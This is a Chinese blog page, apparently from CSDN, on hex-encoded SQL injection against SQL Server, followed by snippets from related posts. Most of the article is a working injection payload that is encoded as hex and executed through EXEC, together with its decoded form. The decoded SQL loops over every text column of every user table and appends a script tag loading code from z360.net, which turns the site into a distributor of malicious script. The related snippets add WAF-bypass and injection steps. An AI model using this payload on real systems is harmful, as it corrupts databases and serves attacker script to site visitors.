16进制的SQL 注入

最新推荐文章于 2025-05-27 15:01:42 发布
最新推荐文章于 2025-05-27 15:01:42 发布
阅读量1.3k 收藏
点赞数
分类专栏: sqlserver 文章标签: SQL C C++ C# .net

通过post,get,cookies方式注入,注入内容如下:

DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032

003500350029002C004000430020005600610072006300680061007200280032003500350029002000440065

0063006C0061007200650020005400610062006C0065005F0043007500720073006F00720020004300750072

0073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C

0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A0065006300740073

00200041002C0053007900730063006F006C0075006D006E0073002000420020005700680065007200650020

0041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D

00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F00720

0200042002E00580074007900700065003D003300350020004F007200200042002E0058007400790070006500

3D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F007

00065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020

004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F0

07200200049006E0074006F002000400054002C004000430020005700680069006C0065002800400040004600

65007400630068005F005300740061007400750073003D0030002900200042006500670069006E002000450078

00650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500

740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E00760065007

2007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0

027005D00290029002B00270027003C0073006300720069007000740020007300720063003D006800740074007

0003A002F002F007A003300360030002E006E00650074003E003C002F007300630072006900700074003E00270

02700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062

006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020004500

6E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F007200200044

00650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--;



在查询分析器里转换的sql语句如下:


Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)

Open Table_Cursor

    Fetch Next From  Table_Cursor  Into @T,@C
  
    While(@@Fetch_Status=0)
    Begin
        Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From  Table_Cursor Into @T,@C
    End
Close Table_Cursor

Deallocate Table_Cursor

 

【漏洞扫描】——15、Goby漏洞扫描工具
Fly_鹏程万里
03-01 1035
MYSQL注入流程(1)判断是否存在SQL注入 ' and 1=1 and 1=2(2)爆字段 order by 猜测的字段数(3)匹配字段 and 1=1 union select 1,2,3,......,n(4)获取显示字段and 1=2 union select 1,2,3,4......n(5)利用内置函数爆数据库信息 version() ...
SQL注入16进制转换工具
10-22
一款很好用的SQL注入16进制转换工具,大家可以试用一下
mysql 16 进制 注入_16进制 SQL注入
weixin_30093045的博客
01-28 1044
dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e...
SQL 三种注入方式详解,(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
05-27 3821
MySQL 提供了 load_file() 函数,可以帮助用户快速读取文件,但文件的位置必须在服务器上,文件必须为绝对路径,且用户必须有 FILE 权限,文件容量也必须小于 max_allowed_packet 字节 (默认为 16MB,最大为 1GB)。SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
SQL注入_16进制转换工具
09-10
SQL注入_16进制转换工具学习用,勿用其它商业用途啊!
16进制 SQL注入
05-26 1171
dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e
进制sql注入是怎么实现的
最新发布
08-11
我们正在讨论二进制SQL注入的实现原理。根据用户提供的引用和之前的问题,我们需要解释二进制SQL注入如何工作,特别是它如何利用二进制数据来执行恶意SQL代码。 引用[1]提到:SQL注入是将恶意代码插入字符串并传递...
16进制转换工具 SQL注入学习小工具 学习
03-04
这个名为"16进制转换工具 SQL注入学习小工具 学习"的压缩包显然是为那些想要深入理解SQL注入攻击和提升16进制转换能力的学习者准备的。下面我们将详细探讨这两个关键知识点。 首先,16进制(Hexadecimal)是一种逢...
SQL注入学习帮助小工具 16进制转换工具
04-23
本工具"SQL注入学习帮助小工具 16进制转换工具"正是针对这一主题设计的,旨在帮助学习者理解和防范这种攻击。 在进行SQL注入攻击时,16进制编码常被用来绕过过滤机制。因为许多过滤系统可能不会检测到16进制形式的...
sql注入方式
m0_69801663的博客
05-28 260
sql注入方式
iwebsec靶场 SQL注入漏洞通关笔记11-16进制编码绕过
mooyuan的网络安全博客
12-01 3145
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第11关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的11关增加了addslashes和get_magic_quotes_gpc函数,可以使用16进制编码的方式进行绕过。
SQL SERVER 注入小工具-进制转换
04-03
可对SQL注入时,进行代码变异注入。这个小工具可对SQL语句进行URL以及16进制的转换。 比如:select * from admin 将成为:0x530065006C0065006300740020002A002000460072006F006D002000610064006D0069006E00 用法: DECLARE @S NVARCHAR(4000); SET @S=CAST(0x530065006C0065006300740020002A002000460072006F006D002000610064006D0069006E00 AS NVARCHAR(4000)); EXEC(@S);
mysql 16进制 绕过_sql注入绕过
weixin_39783633的博客
02-01 944
1.空格过滤绕过可用/**/制表符(url编码为%09)换行符(%0a)括号反引号 代替空格mysql数据库有一个特性。在条件语句中,在 where id =1 后面加上 “=1”,成为where id =1 =1 ,就是对前面所有结果&1,查询的结果与原来一样。where id =1 =0 就是对于前面所有结果&0 ,查询的结果为除去原有查询结果的其他数据,输出的是除去1以外的...
mysql 16进制 注入,将十六进制值插入到mysql
weixin_29118723的博客
01-19 672
Can there any way to insert a hex value into MYSQL?I also want to be able to retreive it in hex form.For example, something like:INSERT INTO table ( hexTag )VALUES ( HEX(0x41) );And if I do this, I wa...
mysql 16进制 注入_将十六进制值插入到mysql
weixin_36416418的博客
01-19 653
Can there any way to insert a hex value into MYSQL?I also want to be able to retreive it in hex form.For example, something like:INSERT INTO table ( hexTag )VALUES ( HEX(0x41) );And if I do this, I wa...
SQL注入
小勇的博客
06-12 1785
使用UNION进一步注入:union select(Oracle使用union select null,null代替1,2)当列数目不对时,会有错误提示 使用order by语句,当order by的列<=SQL语句的列数目的时候,查询正常. 手工注入一:使用union select查询,查看新增内容,从下图可以看出,列2的内容是可以被输出到页面上的,所以下面的查询我们都将使用列2 查询数据库信息,
limit 后注入_SQL注入中的WAF绕过技术
weixin_39932838的博客
11-26 253
1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。也还有大家在Mysql注入中比如表名或是...
SQL注入总结
KHOST的博客
11-29 838
SQL注入的攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。 可显注入 攻击者可以直接在当前界面内容中获取想要获得的内容。 报错注入 数据库查询返回结果并没有在页面中显示,但是应用程序将数据库报错信息打印到了页面中,所以攻击者可以构造数据库报错语句,从报错信息中获取想要获得的内容。 盲注 数据库查询结果无法从直观页面中获取,攻击者通过使用数据库逻辑或使数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值